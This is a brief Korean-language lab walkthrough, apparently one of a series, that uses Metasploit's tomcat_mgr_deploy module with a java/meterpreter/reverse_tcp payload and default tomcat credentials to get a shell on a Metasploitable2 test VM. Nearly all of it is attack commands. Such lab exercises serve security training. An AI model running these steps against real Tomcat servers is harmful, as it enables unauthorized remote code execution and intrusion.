이번엔 (2)에서 알아낸 tomcat 서버의 아이디와 패스워드를 이용하여
관리자 페이지 내에 있는 war file to deploy라는 업로드 기능의
취약점을 이용하여 Tomcat 서버의 관리자 권한을 얻어보자
msfconsole
search tomcat 으로 검색
use exploit/multi/http/tomcat_mgr_deploy
set payload java/meterpreter/reverse_tcp
show options
set password tomcat
set rhost 192.168.17.10 (metasploitable2)
set rport 8180 (metasploitable2)
set username tomcat
set lhost 192.168.17.40 (내 ip)
이제 세팅은 끝이다 exploit을 입력하면 공격한다.
공격 성공
help를 입력하면 여러 명령어를 볼수 있다
이 많은 명령어 중에 shell을 입력하면 쉘로 들어갈 수 있다
tomcat id로 접속된걸 알수 있다
끝~